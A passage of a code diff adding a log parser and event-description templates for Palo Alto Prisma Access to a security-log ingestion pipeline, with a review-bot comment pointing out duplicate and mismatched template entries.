"field": "log.logger", + "value": "traffic" + }, + { + "field": "action.type", + "value": "end" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ] + }, + { + "value": "Session started between {source.ip} and {destination.ip}", + "conditions": [ + { + "field": "log.logger", + "value": "traffic" + }, + { + "field": "action.type", + "value": "start" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ] + }, + { + "value": "Session started between {source.ip} and {destination.ip}", + "conditions": [ + { + "field": "log.logger", + "value": "traffic" + }, + { + "field": "action.type", + "value": "start" + } + ], + "relationships": [ + { + "source": "source.ip", + "target": "destination.ip", + "type": "connected to" + } + ] + }, + { + "value": "{user.name} from {source.ip} connected through {network.type}", + "conditions": [ + { + "field": "event.category", + "value": "session" + }, + { + "field": "user.name" + }, + { + "field": "source.ip" + }, + { + "field": "network.type" + } + ], + "relationships": [ + { + "source": "user.name", + "target": "source.ip", + "type": "connected from" + } + ] + }, + { + "value": "{user.name} from {source.ip} connected", + "conditions": [ + { + "field": "event.category", + "value": "session" + }, + { + "field": "user.name" + }, + { + "field": "source.ip" + } + ], + "relationships": [ + { + "source": "user.name", + "target": "source.ip", + "type": "connected from" + } + ] + }, + { + "value": "{source.address} logout from {destination.user.name} on {destination.address}", + "conditions": [ + { + "field": "event.category", + "value": "authentication" + }, + { + "field": "event.type", + "value": "end" + }, + { + "field": "source.address" + }, + { + "field": "destination.address" + }, + { + "field": "destination.user.name" + } + ] + }, + { + "value": "{source.address} connected with {destination.user.name} on 
{destination.address}", + "conditions": [ + { + "field": "event.category", + "value": "authentication" + }, + { + "field": "source.address" + }, + { + "field": "destination.address" + }, + { + "field": "destination.user.name" + } + ] + }, + { + "value": "{host.mac} connected with {destination.user.name}", + "conditions": [ + { + "field": "event.category", + "value": "authentication" + }, + { + "field": "host.mac" + }, + { + "field": "destination.user.name" + } + ] + }, + { + "value": "Encrypted connection from {source.address} to {destination.address}", + "conditions": [ + { + "field": "event.dataset", + "value": "decryption" + }, + { + "field": "source.address" + }, + { + "field": "destination.address" + } + ] + }, + { + "value": "Host Information Profile from {source.address}", + "conditions": [ + { + "field": "log.logger", + "value": "hipmatch" + }, + { + "field": "source.address" + } + ] + }, + { + "value": "IPtag applied on {source.address}: {action.name}", + "conditions": [ + { + "field": "log.logger", + "value": "hipmatch" + }, + { + "field": "source.address" + }, + { + "field": "action.name" + } + ] + }, + { + "value": "Connection from {source.address} to {destination.address}", + "conditions": [ + { + "field": "source.address" + }, + { + "field": "destination.address" + } + ], + "relationships": [ + { + "source": "source.address", + "target": "destination.address", + "type": "connected to" + } + ] + }, + { + "value": "{source.address} send DNS query {dns.question.type}. Resolution: {dns.resolved_ip}. Category: {paloalto.dns.category} ", + "conditions": [ + { + "field": "source.address" + }, + { + "field": "dns.question.type" + }, + { + "field": "dns.resolved_ip" + }, + { + "field": "paloalto.dns.category" + } + ], + "relationships": [ + { + "source": "source.address", + "target": "dns.resolved_ip", + "type": "queried dns resolution for" + } + ] + } +] 
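Review bot: The entry `{event.action} threat between {source.nat.ip} and {destination.nat.ip}` conditions on the NAT fields but its relationship still links `source.ip` to `destination.ip`, so the relationship can point at fields the event does not carry; it should read `"source": "source.nat.ip", "target": "destination.nat.ip"` to match its conditions. The `Session started between {source.ip} and {destination.ip}` entry appears twice in a row with identical conditions and relationships, so the second copy is dead and should be dropped. The udp and tcp `Session denied/dropped/ended/started between {source.ip}:{source.port} and {destination.ip}:{destination.port}` entries, and their port-less counterparts, never require `source.ip`, `destination.ip` or the port fields in their conditions, so a traffic event missing any of them renders an unresolved placeholder; adding the corresponding `{"field": "..."}` conditions, as the icmp entry does, avoids that. The DNS entry's value also ends with a trailing space after `{paloalto.dns.category}`. If the first matching entry wins, the leading `{event.reason}` entry would presumably shadow every later description on events that carry a reason — worth confirming against the evaluation order.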
diff --git a/Palo Alto Networks/paloalto-prima-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prima-access/ingest/parser.yml new file mode 100644 index 000000000..970bde48f --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/ingest/parser.yml 
@@ -0,0 +1,880 @@ +name: Palo Alto Prisma access +ignored_values: ["N/A", "unknown"] +pipeline: + - name: parsed_event + external: + name: cef.parse-cef + filter: '{{original.message.startswith("CEF")}}' + + # Just used to get the column format + - name: parsed_dsv + filter: '{{original.message.startswith("CEF") == False}}' + external: + name: dsv.parse-dsv + properties: + columnnames: + - tmp1 + - ReceiveTime + - DeviceSN + - Type + delimiter: "," + + # TRAFFIC CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'TRAFFIC'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceAddress + - DestinationAddress + - NATSourceIP + - NATDestinationIP + - Rule + - SourceUser + - DestinationUser + - Application + - VirtualLocation + - SourceZone + - DestinationZone + - InboundInterface + - OutboundInterface + - LogAction + - TimeLogged + - SessionID + - RepeatCount + - SourcePort + - DestinationPort + - NATSourcePort + - NATDestinationPort + - Flags + - IPProtocol + - Action + - Bytes + - BytesSent + - BytesReceived + - Packets + - StartTime + - ElapsedTimeInSec + - Category + - Padding + - seqno + - ActionFlags + - SourceLocation + - DestinationLocation + - cpadding + - pkts_sent + - pkts_received + - SessionEndReason + - DeviceGroupHierarchyLevel1 + - DeviceGroupHierarchyLevel2 + - DeviceGroupHierarchyLevel3 + - DeviceGroupHierarchyLevel4 + - VirtualSystemName + - DeviceName + - ActionSource + - SourceVMUUID + - DestinationVMUUID + - TunnelID/IMSI + - MonitorTag/IMEI + - ParentSessionID + - ParentStartTime + - TunnelType + - SCTPAssociationID + - SCTPChunks + - SCTPChunksSent + - SCTPChunksReceived + - RuleUUID + - HTTP/2Connection + - AppFlapCount + - PolicyID + - LinkSwitches + - SD-WANCluster + - SD-WANDeviceType + - SD-WANClusterType + - SD-WANSite + - DynamicUserGroupName + 
- XFFAddress + - SourceDeviceCategory + - SourceDeviceProfile + - SourceDeviceModel + - SourceDeviceVendor + - SourceDeviceOSFamily + - SourceDeviceOSVersion + - SourceHostname + - SourceMacAddress + - DestinationDeviceCategory + - DestinationDeviceProfile + - DestinationDeviceModel + - DestinationDeviceVendor + - DestinationDeviceOSFamily + - DestinationDeviceOSVersion + - DestinationHostname + - DestinationMacAddress + - ContainerID + - PODNamespace + - PODName + - SourceExternalDynamicList + - DestinationExternalDynamicList + - HostID + - SerialNumber + - SourceDynamicAddressGroup + - DestinationDynamicAddressGroup + - SessionOwner + - HighResolutionTimestamp + delimiter: "," + + # USERID CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'USERID'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - FUTURE_USER + - ReceiveTime + - DeviceSN + - Type + - Subtype + - FUTURE_USE + - GeneratedTime + - VirtualLocation + - SourceIP + - User + - DataSourceName + - EventID + - RepeatCount + - TimeOutThreshold + - SourcePort + - DestinationPort + - DataSource + - DataSourceType + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - FactorType + - FactorCompletionTime + - FactorNumber + - UserGroupFlags + - UserbySource + - TagName + - HighResolutionTimestamp + delimiter: "," + + # GLOBALPROTECT CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'GLOBALPROTECT'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - FUTURE_USE + - ReceiveTime + - DeviceSN + - Type + - Subtype + - FUTURE_USE + - GeneratedTime + - VirtualLocation + - EventID + - Stage + - AuthenticationMethod + - TunnelType + - SourceUser + - SourceLocation + - MachineName + - PublicIP + - PublicIPv6 + - 
PrivateIP + - PrivateIPv6 + - HostID + - DeviceSN + - ClientVersion + - ClientOS + - ClientOSVersion + - RepeatCount + - Reason + - Error + - EventDescription + - Status + - Location + - LoginDuration + - ConnectMethod + - ErrorCode + - Portal + - SequenceNumber + - ActionFlags + - HighResolutionTimestamp + delimiter: "," + + # SYSTEM CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'SYSTEM'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - FUTURE_USE + - ReceiveTime + - DeviceSN + - Type + - Subtype + - FUTURE_USE + - GeneratedTime + - VirtualLocation + - EventID + - Object + - FUTURE_USE + - FUTURE_USE_2 + - Module + - VendorSeverity + - EventDescription + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - FUTURE_USE + - FUTURE_USE + - HighResolutionTimestamp + delimiter: "," + + # THREAT CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'THREAT'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceAddress + - DestinationAddress + - NATSourceIP + - NATDestinationIP + - Rule + - SourceUser + - DestinationUser + - Application + - VirtualLocation + - SourceZone + - DestinationZone + - InboundInterface + - OutboundInterface + - LogAction + - TimeLogged + - SessionID + - RepeatCount + - SourcePort + - DestinationPort + - NATSourcePort + - NATDestinationPort + - Flags + - IPProtocol + - Action + - URLFilename + - Threat_ContentName + - Category + - VendorSeverity + - Direction + - seqno + - ActionFlags + - SourceLocation + - DestinationLocation + - cpadding + - ContentType + - PcapID + - FileDigest + - Cloud + - URLID + - UserAgent + - FileType + - xff + - Referer + - 
Sender + - Subject + - Recipient + - ReportID + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - FileURL + - SourceVMUUID + - DestinationVMUUID + - HttpMethod + - TunnelIDIMSI + - MonitorTagIMEI + - ParentSessionID + - ParentSessionStartTime + - Tunnel + - Threat_Category + - Contentver + - SigFlags + - SCTPAssociationID + - PayloadProtocolID + - HttpHeaders + - URLCategoryList + - RuleUUID + - HTTP/2Connection + - DynamicUserGroupName + - XFFAddress + - SourceDeviceCategory + - SourceDeviceProfile + - SourceDeviceModel + - SourceDeviceVendor + - SourceDeviceOSFamily + - SourceDeviceOSVersion + - SourceHostname + - SourceMACAddress + - DestinationDeviceCategory + - DestinationDeviceProfile + - DestinationDeviceModel + - DestinationDeviceVendor + - DestinationDeviceOSFamily + - DestinationDeviceOSVersion + - DestinationHostname + - DestinationMACAddress + - ContainerID + - PODNamespace + - PODName + - SourceExternalDynamicList + - DestinationExternalDynamicList + - HostID + - SerialNumber + - DomainEDL + - SourceDynamicAddressGroup + - DestinationDynamicAddressGroup + - PartialHash + - HighResolutionTimestamp + delimiter: "," + + - name: parsed_timestamp + external: + name: date.parse + properties: + input_field: "{{parsed_event.message.rt}}" + output_field: datetime + # ingest does not allow this stage to resolve Jinja template ATM + #timezone: '{{parsed_event.message.dtz}}' + filter: '{{parsed_event.message.get("rt") != None}}' + + - name: parsed_start + external: + name: date.parse + properties: + input_field: "{{parsed_event.message.start}}" + output_field: datetime + # ingest does not allow this stage to resolve Jinja template ATM + #timezone: '{{parsed_event.message.dtz}}' + filter: '{{parsed_event.message.get("start") != None}}' + + # Parse JSON events + - name: parsed_event + external: + name: json.parse-json + filter: '{{original.message | re_match("^\\s*\\{.*\\}\\s*$")}}' + + - 
name: parsed_timestamp + external: + name: date.parse + properties: + input_field: "{{parsed_event.message.EventTime or parsed_event.message.TimeGenerated or parsed_event.message.ReceiveTime}}" + output_field: datetime + filter: '{{parsed_event.message.get("EventTime") != None or parsed_event.message.get("TimeGenerated") != None or parsed_event.message.get("ReceiveTime") != None}}' + + - name: parsed_timestamp + external: + name: date.parse + properties: + input_field: "{{parsed_event.message.HighResolutionTimestamp}}" + output_field: datetime + filter: '{{parsed_event.message.get("HighResolutionTimestamp") != None}}' + + - name: parsed_start + external: + name: date.parse + properties: + input_field: "{{parsed_event.message.SessionStartTime}}" + output_field: datetime + filter: '{{parsed_event.message.get("SessionStartTime") != None}}' + + - name: parsed_description + external: + name: grok.match + properties: + input_field: "{{parsed_event.message.EventDescription}}" + pattern: "%{SYSTEM_AUTH_AUTHENTICATION_FOR}|%{CONNECTION}|%{CONTENT}|%{WILDFIRE}|%{NETWORK}|%{PANDB_GENERIC}|%{CLOUD_ELECTION}|%{AUTHENTICATION}" + custom_patterns: + SYSTEM_AUTH_AUTHENTICATION_FOR: "authenticated for user '%{USERNAME:user}'. auth profile '%{DATA:auth_profile}', vsys '%{DATA:vsys}', server profile '%{DATA:server_profile}', server address '%{HOSTNAME:server_address}', 
From: %{IP:src}." + CONNECTION: "%{CONNECTION_SUCCESS}|%{CONNECTION_TO_SERVER}|%{CONNECTION_REGISTERED}" + CONNECTION_SUCCESS: "Successfully connect to address: %{IP:dst} port: %{NUMBER:dport}, conn id: %{DATA:connection_id}" + CONNECTION_TO_SERVER: "Connection to %{DATA} server: %{DATA:dst_addr} completed successfully, initiated by %{IP:src}" + CONNECTION_REGISTERED: "Successfully registered to Public Cloud %{DATA:dst_domain}" + WILDFIRE: "%{WILDFIRE_GENERIC}|%{WILDFIRE_CLOUD_FAILED}" + WILDFIRE_NAME: "WildFire" + WILDFIRE_GENERIC: "%{WILDFIRE_NAME:module} %{DATA}" + WILDFIRE_CLOUD_FAILED: "Failed to perform task resulting in connection timeout with %{WILDFIRE_NAME:module} Cloud %{HOSTNAME:dst_domain}" + NETWORK: "%{DHCP_RENEW}|%{NTP_SYNC}|%{PORT_UP}" + DHCP_RENEW: "DHCP RENEW: interface %{NOTSPACE:intf}, ip %{IP:src} netmask %{IP} dhcp server: %{IPORHOST:dst_addr}" + NTP_SYNC: "NTP sync to server %{HOSTNAME:dst_addr}" + PORT_UP: "Port %{NOTSPACE:intf}: %{DATA:action} %{DATA}" + PANDB_NAME: "PAN-DB" + PANDB_GENERIC: "%{PANDB_NAME:module} %{DATA}" + CONTENT: "%{CONTENT_INSTALLATION}|%{CONTENT_UPDATE}|%{CONTENT_UPGRADE}" + CONTENT_INSTALLATION: "Installed %{NOTSPACE:module} package: %{DATA:filename}" + CONTENT_UPDATE: "Content update job succeeded for user %{USERNAME:user}" + CONTENT_UPGRADE: "Content package upgraded from version %{DATA} by %{USERNAME:user}" + CLOUD_ELECTION: "CLOUD ELECTION: %{HOSTNAME:dst_domain} IP: %{IP:dst} was elected, %{DATA}." + AUTHENTICATION: "%{AUTHENTICATION_CONSOLE}|%{AUTHENTICATION_WEB}" + AUTHENTICATION_CONSOLE: "authenticated for user '%{USERNAME:user}'. 
From: %{IP:src}." + AUTHENTICATION_WEB: "User %{USERNAME:user} logged in via %{DATA} from %{IP:src} using %{DATA:proto}" + filter: '{{parsed_event.message.get("EventDescription") != None}}' + + - name: parsed_threat + external: + name: grok.match + properties: + input_field: "{{parsed_event.message.Threat_ContentName}}" + pattern: '%{DATA:threat_description}?\(%{NUMBER:threat_code}\)' + + - name: set_extracted_fields + - name: set_finalize_user_name + - name: set_category_fields + - name: set_ecs_deviceOutboundInterface + filter: '{{parsed_event.message.get("deviceOutboundInterface") != None}}' + - name: set_ecs_deviceInboundInterface + filter: '{{parsed_event.message.get("deviceInboundInterface") != None}}' + - name: set_action_outcome + - name: set_csv_severity + +stages: + set_csv_severity: + actions: + - set: + event.severity: "{{parsed_event.message.Severity}}" + filter: '{{original.message.startswith("CEF")}}' + + set_ecs_deviceOutboundInterface: + actions: + - set: + observer.egress.interface.name: "{{parsed_event.message.deviceOutboundInterface}}" + observer.egress.interface.id: '{{parsed_event.message.deviceOutboundInterface.split("/") | last}}' + + set_ecs_deviceInboundInterface: + actions: + - set: + observer.ingress.interface.name: "{{parsed_event.message.deviceInboundInterface | last}}" + observer.ingress.interface.id: '{{parsed_event.message.deviceOutboundInterface.split("/") | last}}' + + set_action_outcome: + actions: + - set: + action.outcome: "{{parsed_event.message.Status}}" + filter: "{{parsed_event.message.Status != None}}" + - set: + action.outcome: "success" + filter: "{{parsed_event.message.Action != null}}" + + set_extracted_fields: + actions: + - set: + "@timestamp": "{{parsed_timestamp.datetime}}" + event.start: "{{parsed_start.datetime}}" + action.name: "{{parsed_event.message.Action or parsed_description.message.action}}" + action.type: "{{parsed_event.message.Subtype|lower or parsed_event.message.Name|lower}}" + container.id: 
"{{parsed_event.message.ContainerID}}" + container.name: "{{parsed_event.message.ContainerName}}" + destination.address: "{{parsed_event.message.DestinationAddress or parsed_event.message.dst or parsed_description.message.dst_addr}}" + destination.bytes: "{{parsed_event.message.BytesReceived or parsed_event.message.out}}" + destination.domain: "{{parsed_description.message.dst_domain}}" + - set: + destination.ip: "{{parsed_event.message.DestinationAddress}}" + filter: "{{parsed_event.message.DestinationAddress| is_ipaddress}}" + + - set: + destination.ip: "{{parsed_event.message.dst}}" + filter: "{{parsed_event.message.dst | is_ipaddress}}" + + - set: + destination.ip: "{{parsed_description.message.dst}}" + filter: "{{parsed_description.message.dst | is_ipaddress}}" + + - set: + destination.nat.ip: "{{parsed_event.message.destinationTranslatedAddress}}" + filter: "{{parsed_event.message.destinationTranslatedAddress | is_ipaddress}}" + + - set: + destination.nat.ip: "{{parsed_event.message.NATDestinationIP}}" + filter: "{{parsed_event.message.NATDestinationIP | is_ipaddress}}" + + - set: + destination.nat.port: "{{parsed_event.message.destinationTranslatedPort or parsed_event.message.NATDestinationPort}}" + filter: "{{(parsed_event.message.get('destinationTranslatedPort') != None and (parsed_event.message.destinationTranslatedPort is number or parsed_event.message.destinationTranslatedPort.isdigit())) or (parsed_event.message.get('NATDestinationPort') != None and (parsed_event.message.NATDestinationPort is number or parsed_event.message.NATDestinationPort.isdigit()))}}" + + - set: + destination.packets: "{{parsed_event.message.PanOSPacketsReceived or parsed_event.message.pkts_received}}" + filter: "{{(parsed_event.message.get('PanOSPacketsReceived') != None and (parsed_event.message.PanOSPacketsReceived is number or parsed_event.message.PanOSPacketsReceived.isdigit())) or (parsed_event.message.get('pkts_received') != None and (parsed_event.message.pkts_received is 
number or parsed_event.message.pkts_received.isdigit()))}}" + + - set: + event.duration: "{{parsed_event.message.ElapsedTimeInSec or parsed_event.message.SessionDuration}}" + filter: "{{(parsed_event.message.get('ElapsedTimeInSec') != None and (parsed_event.message.ElapsedTimeInSec is number or parsed_event.message.ElapsedTimeInSec.isdigit())) or (parsed_event.message.get('SessionDuration') != None and (parsed_event.message.SessionDuration is number or parsed_event.message.SessionDuration.isdigit()))}}" + + - set: + network.packets: "{{parsed_event.message.Packets or parsed_event.message.PacketsTotal}}" + filter: "{{ (parsed_event.message.get('PacketsTotal') != None and (parsed_event.message.PacketsTotal is number or parsed_event.message.PacketsTotal.isdigit())) or (parsed_event.message.get('Packets') != None and (parsed_event.message.Packets is number or parsed_event.message.Packets.isdigit())) }}" + + - set: + event.reason: "{{parsed_event.message.reason or parsed_event.message.EventDescription or parsed_event.message.PanOSConnectionError or parsed_event.message.Description}}" + + - set: + event.reason: "{{ parsed_threat.message.threat_description }}" + event.code: "{{ parsed_threat.message.threat_code }}" + filter: "{{ parsed_threat.get('message') != None }}" + + - set: + destination.port: "{{parsed_event.message.DestinationPort or parsed_event.message.dpt or parsed_description.message.dport}}" + destination.user.name: "{{parsed_event.message.duser or parsed_event.message.DestinationUser}}" + email.from.address: "{{parsed_event.message.Sender}}" + email.subject: "{{parsed_event.message.Subject}}" + email.to.address: "{{parsed_event.message.Recipient}}" + event.action: "{{parsed_event.message.act or parsed_event.message.Action or parsed_description.message.action}}" + event.timezone: "{{parsed_event.message.dtz}}" + event.dataset: "{{parsed_event.message.DeviceEventClassID|lower or parsed_event.message.Type|lower or parsed_event.message.LogType|lower}}" + 
event.module: "{{parsed_description.message.module}}" + host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}" + host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost}}" + host.id: "{{parsed_event.message.deviceExternalId}}" + host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}" + host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}" + host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}" + host.os.type: "{{parsed_event.message.PanOSEndpointOSType}}" + host.type: "{{parsed_event.message.PanOSSourceDeviceCategory}}" + http.request.method: "{{parsed_event.message.HttpMethod or parsed_event.message.HTTPMethod}}" + http.request.referrer: "{{parsed_event.message.Referer}}" + log.hostname: "{{parsed_event.message.DeviceName or parsed_event.message.dvchost}}" + log.level: "{{parsed_event.message.VendorSeverity}}" + log.logger: "{{parsed_event.message.DeviceEventClassID|lower or parsed_event.message.Type|lower or parsed_event.message.LogType|lower}}" + network.application: "{{parsed_event.message.Application or parsed_event.message.app}}" + network.bytes: "{{parsed_event.message.Bytes or parsed_event.message.PanOSBytes}}" + network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}" + network.protocol: "{{parsed_description.message.proto}}" + network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}" + observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}" + observer.ingress.interface.alias: "{{parsed_event.message.FromZone or 
parsed_event.message.cs4}}" + observer.ingress.interface.name: "{{parsed_description.message.intf}}" + observer.product: "PAN-OS" + observer.vendor: "{{parsed_event.message.DeviceVendor}}" + observer.type: "{{parsed_event.message.DeviceProduct}}" + observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}" + observer.serial_number: "{{parsed_event.message.DeviceSN}}" + observer.name: "{{parsed_event.message.DeviceName}}" + rule.name: "{{parsed_event.message.Rule}}" + rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}" + source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}" + + - set: + file.path: "{{parsed_event.message.URLFilename}}" + file.name: "{{parsed_event.message.FileName or parsed_event.message.URLFilename or parsed_description.message.filename}}" + filter: "{{final.action.type != 'url'}}" + + - set: + url.original: "{{parsed_event.message.URL}}" + + - set: + url.original: "{{parsed_event.message.FileName or parsed_event.message.URLFilename}}" + url.domain: '{{final.url.original.split("/")[0].split(":")[0]}}' + destination.domain: '{{final.url.original.split("/")[0].split(":")[0]}}' + url.port: '{{final.url.original.split("/")[0].split(":")[1]}}' + url.path: '{{final.url.original.split("?")[0].split("/")[1:] | join("/")}}' + url.query: '{{final.url.original.split("?")[1]}}' + filter: "{{final.action.type == 'url'}}" + + - delete: + - url.original + filter: "{{final.action.type == 'url'}}" + + - set: + source.ip: "{{parsed_event.message.PublicIPv4}}" + filter: "{{parsed_event.message.PublicIPv4 | is_ipaddress}}" + + - set: + source.ip: "{{parsed_event.message.PublicIP}}" + filter: "{{parsed_event.message.PublicIP | is_ipaddress}}" + + - set: + source.ip: "{{parsed_event.message.SourceAddress}}" + filter: "{{parsed_event.message.SourceAddress | is_ipaddress}}" + + - set: + source.ip: "{{parsed_event.message.SourceIP}}" + filter: 
"{{parsed_event.message.SourceIP | is_ipaddress}}" + + - set: + source.ip: "{{parsed_event.message.src}}" + filter: "{{parsed_event.message.src | is_ipaddress}}" + + - set: + source.ip: "{{parsed_description.message.src}}" + filter: "{{parsed_description.message.src | is_ipaddress}}" + + - set: + source.ip: "{{parsed_event.message.PublicIP}}" + filter: "{{parsed_event.message.PublicIP | is_ipaddress}}" + + - set: + source.ip: "{{parsed_event.message.SourceAddress}}" + filter: "{{parsed_event.message.SourceAddress | is_ipaddress}}" + + - set: + source.ip: "{{parsed_event.message.SourceIP}}" + filter: "{{parsed_event.message.SourceIP | is_ipaddress}}" + + - set: + source.ip: "{{parsed_event.message.src}}" + filter: "{{parsed_event.message.src | is_ipaddress}}" + + - set: + source.ip: "{{parsed_description.message.src}}" + filter: "{{parsed_description.message.src | is_ipaddress}}" + + - set: + source.nat.ip: "{{parsed_event.message.NATSource}}" + filter: "{{parsed_event.message.NATSource | is_ipaddress}}" + + - set: + source.nat.ip: "{{parsed_event.message.NATSourceIP}}" + filter: "{{parsed_event.message.NATSourceIP | is_ipaddress}}" + + - set: + source.nat.ip: "{{parsed_event.message.sourceTranslatedAddress}}" + filter: "{{parsed_event.message.sourceTranslatedAddress | is_ipaddress}}" + + - set: + destination.nat.ip: "{{parsed_event.message.NATDestination}}" + filter: "{{parsed_event.message.NATDestination | is_ipaddress}}" + + - set: + network.forwarded_ip: "{{parsed_event.message.get('X-Forwarded-For')}}" + filter: "{{ parsed_event.message.get('X-Forwarded-For') | is_ipaddress }}" + + - set: + network.forwarded_ip: "{{parsed_event.message.XFFAddress or parsed_event.message.xff}}" + filter: "{{parsed_event.message.XFFAddress | is_ipaddress or parsed_event.message.xff | is_ipaddress}}" + + - set: + source.geo.country_iso_code: "{{parsed_event.message.SourceRegion or parsed_event.message.SourceLocation}}" + filter: "{{parsed_event.message.SourceLocation | length == 2 
or parsed_event.message.PanOSSourceLocation | length == 2}}" + - set: + destination.geo.country_iso_code: "{{parsed_event.message.PanOSDestinationLocation or parsed_event.message.DestinationLocation}}" + filter: "{{parsed_event.message.DestinationLocation | length == 2 or parsed_event.message.PanOSDestinationLocation | length == 2}}" + - set: + action.name: "{{parsed_event.message.EventID or parsed_event.message.PanOSEventIDValue}}" + filter: '{{final.action.name == null and (parsed_event.message.EventID not in [null, "0"] or parsed_event.message.PanOSEventIDValue not in [null, "0"])}}' + + - set: + source.nat.port: "{{parsed_event.message.NATSourcePort or parsed_event.message.sourceTranslatedPort}}" + source.packets: "{{parsed_event.message.PanOSPacketsSent or parsed_event.message.pkts_sent}}" + source.port: "{{parsed_event.message.SourcePort or parsed_event.message.spt}}" + source.user.name: "{{parsed_event.message.suser or parsed_event.message.PanOSSourceUserName or parsed_event.message.SourceUserName}}" + user_agent.name: "{{parsed_event.message.UserAgent}}" + user_agent.os.name: "{{parsed_event.message.ClientOS}}" + user_agent.os.version: "{{parsed_event.message.ClientOSVersion}}" + user.name: "{{parsed_event.message.User or parsed_event.message.suser or parsed_event.message.PanOSSourceUserName or parsed_description.message.user}}" + paloalto.ContentType: "{{parsed_event.message.ContentType | replace('\x00', '')}}" + paloalto.DGHierarchyLevel1: "{{parsed_event.message.DGHierarchyLevel1 | replace('\x00', '')}}" + paloalto.DGHierarchyLevel2: "{{parsed_event.message.DGHierarchyLevel2 | replace('\x00', '')}}" + paloalto.DGHierarchyLevel3: "{{parsed_event.message.DGHierarchyLevel3 | replace('\x00', '')}}" + paloalto.DGHierarchyLevel4: "{{parsed_event.message.DGHierarchyLevel4 | replace('\x00', '')}}" + paloalto.DirectionOfAttack: "{{parsed_event.message.DirectionOfAttack | replace('\x00', '')}}" + paloalto.EventID: "{{parsed_event.message.EventID | replace('\x00', 
'')}}" + paloalto.PanOSContainerName: "{{parsed_event.message.PanOSContainerName | replace('\x00', '')}}" + paloalto.PanOSContainerNameSpace: "{{parsed_event.message.PanOSContainerNameSpace | replace('\x00', '')}}" + paloalto.PanOSDestinationDeviceCategory: "{{parsed_event.message.PanOSDestinationDeviceCategory | replace('\x00', '')}}" + paloalto.PanOSDestinationDeviceHost: "{{parsed_event.message.PanOSDestinationDeviceHost | replace('\x00', '')}}" + paloalto.PanOSDestinationDeviceMac: "{{parsed_event.message.PanOSDestinationDeviceMac | replace('\x00', '')}}" + paloalto.PanOSDestinationDeviceModel: "{{parsed_event.message.PanOSDestinationDeviceModel | replace('\x00', '')}}" + paloalto.PanOSDestinationDeviceOSFamily: "{{parsed_event.message.PanOSDestinationDeviceOSFamily | replace('\x00', '')}}" + paloalto.PanOSDestinationDeviceOSVersion: "{{parsed_event.message.PanOSDestinationDeviceOSVersion | replace('\x00', '')}}" + paloalto.PanOSDestinationDeviceProfile: "{{parsed_event.message.PanOSDestinationDeviceProfile | replace('\x00', '')}}" + paloalto.PanOSDestinationDeviceVendor: "{{parsed_event.message.PanOSDestinationDeviceVendor | replace('\x00', '')}}" + paloalto.PanOSDestinationEDL: "{{parsed_event.message.PanOSDestinationEDL | replace('\x00', '')}}" + paloalto.PanOSDestinationUUID: "{{parsed_event.message.PanOSDestinationUUID | replace('\x00', '')}}" + paloalto.PanOSEndpointSerialNumber: "{{parsed_event.message.PanOSEndpointSerialNumber | replace('\x00', '')}}" + paloalto.PanOSGPHostID: "{{parsed_event.message.PanOSGPHostID | replace('\x00', '')}}" + paloalto.PanOSHASessionOwner: "{{parsed_event.message.PanOSHASessionOwner | replace('\x00', '')}}" + paloalto.PanOSQuarantineReason: "{{parsed_event.message.PanOSQuarantineReason | replace('\x00', '')}}" + paloalto.PanOSSDWANCluster: "{{parsed_event.message.PanOSSDWANCluster | replace('\x00', '')}}" + paloalto.PanOSSDWANClusterType: "{{parsed_event.message.PanOSSDWANClusterType | replace('\x00', '')}}" + 
